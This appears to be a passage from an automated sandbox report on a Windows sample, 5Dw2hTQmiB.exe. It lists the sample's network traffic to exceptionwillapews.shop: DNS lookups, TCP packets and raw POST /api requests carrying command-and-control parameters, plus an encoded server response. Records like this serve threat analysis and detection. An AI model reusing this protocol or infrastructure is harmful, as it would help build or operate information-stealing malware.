                                                                      Apr 18, 2024 09:32:12.841067076 CEST49734443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:12.841115952 CEST44349734104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:12.954829931 CEST49735443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:12.954864979 CEST44349735104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:12.954950094 CEST49735443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:12.955303907 CEST49735443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:12.955316067 CEST44349735104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:13.192435980 CEST44349735104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:13.192599058 CEST49735443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:13.194025040 CEST49735443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:13.194035053 CEST44349735104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:13.194236040 CEST44349735104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:13.195456028 CEST49735443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:13.195563078 CEST49735443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:13.195585012 CEST44349735104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:13.690711975 CEST44349735104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:13.691010952 CEST44349735104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:13.691025019 CEST49735443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:13.691076994 CEST49735443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:13.746777058 CEST49736443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:13.746874094 CEST44349736104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:13.746980906 CEST49736443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:13.747308969 CEST49736443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:13.747343063 CEST44349736104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:13.993623018 CEST44349736104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:13.993825912 CEST49736443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:13.995219946 CEST49736443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:13.995248079 CEST44349736104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:13.995521069 CEST44349736104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:13.996718884 CEST49736443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:13.996818066 CEST49736443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:13.996829987 CEST44349736104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:14.494405985 CEST44349736104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:14.494631052 CEST44349736104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:14.494736910 CEST49736443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:14.496077061 CEST49736443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:14.496143103 CEST44349736104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:15.105446100 CEST49737443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:15.105535030 CEST44349737104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:15.105629921 CEST49737443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:15.106009007 CEST49737443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:15.106043100 CEST44349737104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:15.343338966 CEST44349737104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:15.343432903 CEST49737443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:15.350960970 CEST49737443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:15.351003885 CEST44349737104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:15.351325035 CEST44349737104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:15.352655888 CEST49737443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:15.353552103 CEST49737443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:15.353594065 CEST44349737104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:15.353733063 CEST49737443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:15.353775024 CEST44349737104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:15.353897095 CEST49737443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:15.353959084 CEST44349737104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:15.354090929 CEST49737443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:15.354121923 CEST44349737104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:15.354262114 CEST49737443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:15.354302883 CEST44349737104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:15.354471922 CEST49737443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:15.354513884 CEST49737443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:15.396136999 CEST44349737104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:15.396471024 CEST49737443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:15.396539927 CEST49737443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:15.440125942 CEST44349737104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:15.440371037 CEST49737443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:15.440438032 CEST49737443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:15.440454006 CEST49737443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:15.488123894 CEST44349737104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:15.488399029 CEST49737443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:15.488452911 CEST49737443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:15.536125898 CEST44349737104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:15.536303043 CEST49737443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:15.584120989 CEST44349737104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:15.585107088 CEST44349737104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:15.585324049 CEST49737443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:15.585393906 CEST44349737104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:15.585441113 CEST44349737104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:15.700089931 CEST44349737104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:16.918052912 CEST44349737104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:16.918188095 CEST44349737104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:16.918284893 CEST49737443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:16.918380022 CEST49737443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:16.918418884 CEST44349737104.21.44.10192.168.2.4

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Apr 18, 2024 09:32:08.210973978 CEST6051253192.168.2.41.1.1.1
                                                                      Apr 18, 2024 09:32:08.363225937 CEST53605121.1.1.1192.168.2.4

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Apr 18, 2024 09:32:08.210973978 CEST192.168.2.41.1.1.10xe8aStandard query (0)exceptionwillapews.shopA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Apr 18, 2024 09:32:08.363225937 CEST1.1.1.1192.168.2.40xe8aNo error (0)exceptionwillapews.shop104.21.44.10A (IP address)IN (0x0001)false
                                                                      Apr 18, 2024 09:32:08.363225937 CEST1.1.1.1192.168.2.40xe8aNo error (0)exceptionwillapews.shop172.67.192.201A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • exceptionwillapews.shop

                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.449730104.21.44.104436988C:\Users\user\Desktop\5Dw2hTQmiB.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-04-18 07:32:08 UTC270OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 8
                                                                      Host: exceptionwillapews.shop
                                                                      2024-04-18 07:32:08 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                      Data Ascii: act=life
                                                                      2024-04-18 07:32:09 UTC814INHTTP/1.1 200 OK
                                                                      Date: Thu, 18 Apr 2024 07:32:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=s3pa253ru05kefjab1kcd8rv48; expires=Mon, 12-Aug-2024 01:18:48 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KeZYRsn6yWpNQtm7vJcK6cBeObG2aDxo7MWlVFRRYEjRrYAZSh1Pc44mN3d6kmjmYKqPLRgHBzNZ%2BtS68hlVB%2BbheDuqHvG8gtaLtUmfEBm%2BKgad0cBTa4eDpzb7FRvyDsRn%2FkrBoPLkTA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8762f5941dcf6757-ATL
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2024-04-18 07:32:09 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                      Data Ascii: 2ok
                                                                      2024-04-18 07:32:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.449731104.21.44.104436988C:\Users\user\Desktop\5Dw2hTQmiB.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-04-18 07:32:09 UTC271OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 52
                                                                      Host: exceptionwillapews.shop
                                                                      2024-04-18 07:32:09 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 36 4d 6b 30 4d 2d 2d 6b 65 79 26 6a 3d 64 65 66 61 75 6c 74
                                                                      Data Ascii: act=recive_message&ver=4.0&lid=P6Mk0M--key&j=default
                                                                      2024-04-18 07:32:10 UTC814INHTTP/1.1 200 OK
                                                                      Date: Thu, 18 Apr 2024 07:32:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=huaufno4s755l16q4ntieicc6d; expires=Mon, 12-Aug-2024 01:18:48 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=48arTU%2F29oYrR1jNBuLuEimqXZnsmRI2SPrq7HdvIWR9%2B68JI1giJ2B59CawiU4VThDScn2uWe46QWkLjTgiHbk%2F72T0KeRwGXf%2FKsyTEE2fxz1PTFR2j2xGoobJJUeKaPPbmeqiMwUYFw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8762f5990a1d53cc-ATL
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2024-04-18 07:32:10 UTC555INData Raw: 35 64 62 0d 0a 49 67 65 53 66 36 4d 70 62 6d 4c 33 5a 35 49 61 2f 53 5a 75 77 76 49 4f 4c 4c 32 34 44 51 5a 4f 77 72 47 50 78 50 35 32 79 37 4a 5a 43 70 68 66 67 77 6c 4f 51 49 46 46 71 44 72 4a 43 6d 50 49 30 69 34 4d 6e 5a 70 2b 59 32 7a 34 6b 66 75 32 69 78 50 6e 76 79 67 6e 73 6c 2b 44 43 77 38 47 31 56 32 79 66 4a 78 4b 48 61 66 65 42 41 79 64 6d 43 30 6b 49 37 71 54 74 65 53 6c 66 4f 75 53 41 69 65 79 58 39 67 6b 5a 45 4c 58 52 37 49 36 33 51 5a 4f 34 4a 64 67 44 6f 65 59 4c 33 45 72 6f 4e 54 33 73 4a 73 59 75 4e 74 4e 61 64 49 53 78 6c 30 50 44 35 59 55 2b 54 53 55 53 55 7a 75 2f 77 51 4d 6e 5a 67 74 4a 6d 37 69 6b 61 32 68 68 46 54 78 6b 67 42 4b 39 77 76 43 5a 41 38 52 6e 45 57 2b 45 50 51 45 43 37 62 51 4e 41 79 66 35 43 39 32 4c 37 44 51 34 72
                                                                      Data Ascii: 5dbIgeSf6MpbmL3Z5Ia/SZuwvIOLL24DQZOwrGPxP52y7JZCphfgwlOQIFFqDrJCmPI0i4MnZp+Y2z4kfu2ixPnvygnsl+DCw8G1V2yfJxKHafeBAydmC0kI7qTteSlfOuSAieyX9gkZELXR7I63QZO4JdgDoeYL3EroNT3sJsYuNtNadISxl0PD5YU+TSUSUzu/wQMnZgtJm7ika2hhFTxkgBK9wvCZA8RnEW+EPQEC7bQNAyf5C92L7DQ4r
                                                                      2024-04-18 07:32:10 UTC951INData Raw: 52 55 38 5a 49 41 52 65 41 65 77 6c 38 42 45 64 56 71 6d 44 72 64 42 6b 37 69 30 6e 4d 41 73 4c 49 74 4a 6d 37 69 6b 61 2b 2f 38 33 7a 72 6b 67 49 6e 73 6c 2b 44 43 55 77 48 6d 55 57 6f 4f 74 39 43 41 71 47 64 62 46 7a 58 30 57 52 68 50 71 76 61 34 4b 75 63 47 61 50 66 51 32 58 33 46 38 74 45 42 67 53 59 43 50 5a 34 6e 77 52 43 7a 2f 67 75 44 4a 32 59 4c 53 5a 75 34 70 50 71 76 74 78 4d 36 35 42 6a 59 4f 41 61 7a 56 31 4f 4f 74 56 71 6d 44 72 64 42 6b 37 69 30 6e 4d 41 74 4a 67 74 43 30 54 69 6b 61 2f 6b 33 6c 61 77 76 79 67 6e 73 6c 2b 44 43 55 35 43 31 30 58 33 64 4e 38 63 54 75 43 59 61 55 33 63 30 57 42 6e 4a 4b 76 42 37 62 53 61 47 61 7a 43 52 6d 44 2b 46 38 4a 5a 42 67 36 54 42 76 6c 7a 6c 6b 45 4c 70 4e 41 69 49 62 65 59 4c 53 5a 75 34 70 47 76 35
                                                                      Data Ascii: RU8ZIAReAewl8BEdVqmDrdBk7i0nMAsLItJm7ika+/83zrkgInsl+DCUwHmUWoOt9CAqGdbFzX0WRhPqva4KucGaPfQ2X3F8tEBgSYCPZ4nwRCz/guDJ2YLSZu4pPqvtxM65BjYOAazV1OOtVqmDrdBk7i0nMAtJgtC0Tika/k3lawvygnsl+DCU5C10X3dN8cTuCYaU3c0WBnJKvB7bSaGazCRmD+F8JZBg6TBvlzlkELpNAiIbeYLSZu4pGv5
                                                                      2024-04-18 07:32:10 UTC1369INData Raw: 34 39 30 64 0d 0a 4e 43 31 52 43 31 52 66 37 64 5a 35 4b 48 71 32 43 59 6b 2f 5a 32 6d 78 6a 4b 4b 76 5a 37 71 6d 55 47 61 50 63 52 32 48 77 46 73 68 44 42 77 36 55 52 62 34 58 39 77 5a 4f 34 74 49 75 44 4a 32 59 4c 32 4d 30 34 49 75 76 35 72 73 41 72 73 42 4d 61 4f 59 61 67 53 52 6b 51 74 64 48 73 6a 72 64 57 30 4c 50 2b 43 34 4d 6e 5a 67 74 4a 6a 58 50 75 36 2f 6b 33 6c 62 72 6b 67 49 6e 73 42 72 4e 43 31 52 43 31 51 50 38 66 5a 42 4b 44 4b 36 52 59 55 6a 62 31 32 39 32 4b 72 4c 55 37 4b 57 66 45 71 7a 55 51 47 54 31 47 4d 56 44 43 41 79 61 52 62 34 58 39 77 5a 4f 34 74 49 75 44 4a 32 59 4c 32 4d 30 34 49 75 76 35 72 4d 44 70 38 5a 4c 63 66 63 4e 30 48 46 4f 4e 5a 59 4c 2f 6e 2b 4a 42 47 50 49 30 69 34 4d 6e 5a 67 74 65 32 4c 50 75 36 2f 6b 33 6c 62 72
                                                                      Data Ascii: 490dNC1RC1Rf7dZ5KHq2CYk/Z2mxjKKvZ7qmUGaPcR2HwFshDBw6URb4X9wZO4tIuDJ2YL2M04Iuv5rsArsBMaOYagSRkQtdHsjrdW0LP+C4MnZgtJjXPu6/k3lbrkgInsBrNC1RC1QP8fZBKDK6RYUjb1292KrLU7KWfEqzUQGT1GMVDCAyaRb4X9wZO4tIuDJ2YL2M04Iuv5rMDp8ZLcfcN0HFONZYL/n+JBGPI0i4MnZgte2LPu6/k3lbr
                                                                      2024-04-18 07:32:10 UTC1369INData Raw: 34 65 30 30 51 49 41 4a 6b 4e 2b 6e 57 52 51 41 53 70 6d 32 64 49 33 39 74 6c 4a 47 4c 50 75 36 2f 6b 33 6c 62 72 6b 67 49 6e 73 42 72 5a 43 31 52 43 31 54 48 33 64 4a 4a 4c 54 70 57 54 59 6b 44 59 7a 43 38 4c 52 4f 4b 52 72 2b 54 65 56 72 61 65 4c 77 32 79 58 34 4d 4a 54 6b 4b 4d 61 70 67 36 33 51 5a 4f 34 74 49 75 44 4a 2f 64 59 79 52 30 34 70 50 68 72 35 77 66 6f 39 52 41 59 76 30 59 77 6b 77 50 44 5a 49 50 2f 6e 2b 62 53 41 57 74 6c 6d 78 4a 32 39 39 39 59 53 57 73 33 36 33 6f 38 33 7a 72 6b 67 49 6e 73 6c 2b 44 43 55 77 48 6a 55 57 6f 4f 74 39 72 43 37 61 54 51 30 33 4f 30 79 38 4c 52 4f 4b 52 72 2b 54 65 56 72 61 65 4c 77 32 79 58 34 4d 4a 54 6b 4b 4d 61 70 67 36 33 51 5a 4f 34 74 49 75 44 4a 2f 64 59 79 52 30 34 70 50 71 6f 35 51 66 72 39 68 41 64
                                                                      Data Ascii: 4e00QIAJkN+nWRQASpm2dI39tlJGLPu6/k3lbrkgInsBrZC1RC1TH3dJJLTpWTYkDYzC8LROKRr+TeVraeLw2yX4MJTkKMapg63QZO4tIuDJ/dYyR04pPhr5wfo9RAYv0YwkwPDZIP/n+bSAWtlmxJ2999YSWs363o83zrkgInsl+DCUwHjUWoOt9rC7aTQ03O0y8LROKRr+TeVraeLw2yX4MJTkKMapg63QZO4tIuDJ/dYyR04pPqo5Qfr9hAd
                                                                      2024-04-18 07:32:10 UTC1369INData Raw: 64 48 42 65 53 61 70 67 36 33 51 5a 4f 34 74 4a 7a 41 4c 43 79 4c 53 5a 75 34 70 47 76 76 2f 4e 38 36 35 49 43 4a 37 4a 66 67 77 6c 4d 42 35 6c 46 71 44 72 66 54 68 36 6c 6e 6d 68 45 32 74 35 6a 62 69 79 6c 77 65 57 67 6d 78 69 68 31 55 39 6a 39 52 44 47 51 41 38 53 68 77 62 30 64 70 4d 45 51 73 2f 34 4c 67 79 64 6d 43 30 6d 62 75 4b 54 36 72 37 63 54 4f 75 51 5a 58 4c 7a 44 63 64 49 54 47 2f 39 52 37 49 36 33 51 5a 4f 76 39 34 44 4a 70 32 59 4c 53 5a 75 34 73 71 43 7a 74 35 57 36 35 49 43 4a 37 4a 66 67 55 77 41 51 4d 31 48 73 48 69 52 53 41 65 6e 6d 32 64 4b 32 39 70 69 62 79 4b 75 32 75 47 75 6b 42 4f 37 33 55 56 74 2b 68 54 45 52 77 45 44 68 77 62 78 4f 4e 45 72 5a 4f 4c 53 4c 67 79 64 6d 43 30 6d 62 4b 66 4c 72 66 37 65 56 49 37 6a 64 30 61 77 63 71
                                                                      Data Ascii: dHBeSapg63QZO4tJzALCyLSZu4pGvv/N865ICJ7JfgwlMB5lFqDrfTh6lnmhE2t5jbiylweWgmxih1U9j9RDGQA8Shwb0dpMEQs/4LgydmC0mbuKT6r7cTOuQZXLzDcdITG/9R7I63QZOv94DJp2YLSZu4sqCzt5W65ICJ7JfgUwAQM1HsHiRSAenm2dK29pibyKu2uGukBO73UVt+hTERwEDhwbxONErZOLSLgydmC0mbKfLrf7eVI7jd0awcq
                                                                      2024-04-18 07:32:10 UTC1369INData Raw: 6b 68 32 77 49 4e 30 45 49 4b 65 64 51 6b 58 54 33 53 38 4c 52 4f 4b 52 72 2b 54 65 56 72 61 65 4c 77 32 79 58 34 4d 4a 54 6b 4b 4d 61 70 67 36 33 51 5a 4f 34 74 49 75 44 4a 2f 64 59 79 52 30 34 70 50 68 72 4a 41 64 71 64 6c 46 62 66 73 55 78 45 6f 48 42 5a 59 44 2f 58 65 57 56 67 61 6a 6e 6d 39 43 30 39 78 75 5a 7a 36 6f 32 71 33 6f 38 33 7a 72 6b 67 49 6e 73 6c 2b 44 43 55 77 48 6a 55 57 6f 4f 74 39 6c 41 71 32 45 61 31 36 66 74 51 63 6d 62 75 4b 52 72 2b 53 44 57 73 61 34 4b 79 65 79 42 4b 34 6a 54 6b 4c 58 52 37 49 36 33 51 5a 4d 70 35 77 73 46 70 32 61 62 47 55 6a 6f 39 4c 67 6f 4a 55 63 71 64 5a 46 61 76 30 54 78 6b 77 4d 44 5a 73 4b 39 6e 43 53 53 41 65 75 6d 57 70 4f 33 74 41 76 4b 6b 50 49 6b 61 2f 6b 33 6c 62 72 6b 67 49 6c 39 77 57 42 45 30 35
                                                                      Data Ascii: kh2wIN0EIKedQkXT3S8LROKRr+TeVraeLw2yX4MJTkKMapg63QZO4tIuDJ/dYyR04pPhrJAdqdlFbfsUxEoHBZYD/XeWVgajnm9C09xuZz6o2q3o83zrkgInsl+DCUwHjUWoOt9lAq2Ea16ftQcmbuKRr+SDWsa4KyeyBK4jTkLXR7I63QZMp5wsFp2abGUjo9LgoJUcqdZFav0TxkwMDZsK9nCSSAeumWpO3tAvKkPIka/k3lbrkgIl9wWBE05
                                                                      2024-04-18 07:32:10 UTC1369INData Raw: 6a 69 75 55 77 7a 67 2f 77 51 4d 6e 5a 67 74 4a 6d 36 2f 6e 59 62 4a 39 48 76 42 75 77 49 6e 36 58 4b 70 43 55 35 43 31 30 65 79 4f 74 30 45 43 36 7a 51 4e 41 79 66 31 57 4a 32 49 4b 2f 54 37 4b 57 59 48 36 37 57 52 6d 54 7a 47 4d 4a 4f 43 67 47 56 43 66 70 2f 6c 30 34 43 72 5a 5a 6f 53 4e 6d 61 49 51 74 45 34 70 47 76 35 4e 35 57 36 35 49 41 59 75 68 64 6d 51 6c 4d 4d 70 67 4c 2b 58 75 5a 53 52 71 49 6f 53 77 68 74 35 67 74 4a 6d 37 69 6b 66 4c 6f 38 33 7a 43 6b 67 4a 38 6e 33 57 44 43 55 35 43 31 30 65 79 4f 74 39 44 41 4f 44 49 4c 67 37 62 30 57 64 6f 4b 61 6a 57 37 4b 36 57 48 4b 62 66 55 6d 54 2f 46 4d 5a 41 41 51 2b 62 41 50 35 71 6d 45 38 48 71 4a 6c 69 53 4a 2b 55 41 41 78 75 34 70 47 76 35 4e 35 57 36 35 42 48 66 62 42 46 67 77 73 36 41 35 73 4f
                                                                      Data Ascii: jiuUwzg/wQMnZgtJm6/nYbJ9HvBuwIn6XKpCU5C10eyOt0EC6zQNAyf1WJ2IK/T7KWYH67WRmTzGMJOCgGVCfp/l04CrZZoSNmaIQtE4pGv5N5W65IAYuhdmQlMMpgL+XuZSRqIoSwht5gtJm7ikfLo83zCkgJ8n3WDCU5C10eyOt9DAODILg7b0WdoKajW7K6WHKbfUmT/FMZAAQ+bAP5qmE8HqJliSJ+UAAxu4pGv5N5W65BHfbBFgws6A5sO
                                                                      2024-04-18 07:32:10 UTC1369INData Raw: 34 46 71 5a 64 67 53 74 69 61 49 51 74 45 34 70 47 76 35 4e 35 57 36 35 49 41 59 75 68 64 6d 51 6c 4d 4b 37 51 6f 33 48 2b 46 42 47 50 49 30 69 34 4d 6e 5a 67 74 65 32 4c 50 75 36 2f 6b 33 6c 62 72 6b 6c 6b 4b 6d 46 2b 44 43 55 35 43 31 30 65 79 4f 4a 68 49 54 50 6a 53 4c 45 4c 57 31 6d 56 76 4b 36 72 64 35 4b 69 58 42 72 76 54 52 47 62 35 48 73 5a 43 41 67 43 53 41 50 35 2f 6e 6b 38 49 71 70 4e 71 44 70 47 31 42 79 5a 75 34 70 47 76 35 4e 35 57 36 64 64 59 4a 61 68 66 67 57 63 50 41 4a 67 66 73 42 66 33 42 6b 37 69 30 69 34 4d 77 4a 51 41 44 47 37 69 6b 61 2f 6b 33 67 33 47 75 41 49 6e 73 6c 2b 44 43 55 35 43 31 51 4c 38 4f 4d 63 47 54 4b 71 52 61 45 44 4e 30 57 4e 6c 50 72 4c 42 36 36 65 53 48 36 58 58 51 32 76 2f 48 73 31 4e 42 77 69 55 43 76 78 78 6e
                                                                      Data Ascii: 4FqZdgStiaIQtE4pGv5N5W65IAYuhdmQlMK7Qo3H+FBGPI0i4MnZgte2LPu6/k3lbrklkKmF+DCU5C10eyOJhITPjSLELW1mVvK6rd5KiXBrvTRGb5HsZCAgCSAP5/nk8IqpNqDpG1ByZu4pGv5N5W6ddYJahfgWcPAJgfsBf3Bk7i0i4MwJQADG7ika/k3g3GuAInsl+DCU5C1QL8OMcGTKqRaEDN0WNlPrLB66eSH6XXQ2v/Hs1NBwiUCvxxn
                                                                      2024-04-18 07:32:10 UTC1369INData Raw: 58 59 41 36 48 6d 43 39 6e 4b 36 50 53 35 36 2b 51 47 36 37 55 55 6d 2f 33 44 38 42 4b 42 77 32 5a 42 66 31 31 6c 55 55 46 72 5a 78 68 53 64 6a 56 61 69 52 69 7a 37 75 76 35 4e 35 57 36 35 49 43 4a 37 41 61 32 51 74 55 51 74 55 6b 2f 58 4f 54 48 31 62 67 2f 77 51 4d 6e 5a 67 74 4a 6d 36 2f 6e 59 4c 4f 33 6c 62 72 6b 67 49 6e 36 58 4b 70 43 55 35 43 31 30 65 79 4f 74 30 45 43 36 7a 51 4e 41 79 66 32 6d 56 68 4a 71 33 51 34 71 57 4f 46 61 2f 43 51 47 6a 36 44 38 74 41 43 51 32 59 43 50 4e 2b 6d 55 38 41 73 70 6c 73 54 64 53 61 49 51 74 45 34 70 47 76 35 4e 35 57 36 35 49 41 59 75 68 64 6d 51 6c 4d 49 34 49 54 2b 6e 2b 54 55 67 65 68 6b 33 70 44 7a 35 6f 41 44 47 37 69 6b 61 2f 6b 33 67 76 6e 76 79 67 6e 73 6c 2b 44 43 55 34 5a 2b 6d 32 79 4f 74 30 47 54 75
                                                                      Data Ascii: XYA6HmC9nK6PS56+QG67UUm/3D8BKBw2ZBf11lUUFrZxhSdjVaiRiz7uv5N5W65ICJ7Aa2QtUQtUk/XOTH1bg/wQMnZgtJm6/nYLO3lbrkgIn6XKpCU5C10eyOt0EC6zQNAyf2mVhJq3Q4qWOFa/CQGj6D8tACQ2YCPN+mU8AsplsTdSaIQtE4pGv5N5W65IAYuhdmQlMI4IT+n+TUgehk3pDz5oADG7ika/k3gvnvygnsl+DCU4Z+m2yOt0GTu


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.449732104.21.44.104436988C:\Users\user\Desktop\5Dw2hTQmiB.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-04-18 07:32:10 UTC289OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 18161
                                                                      Host: exceptionwillapews.shop
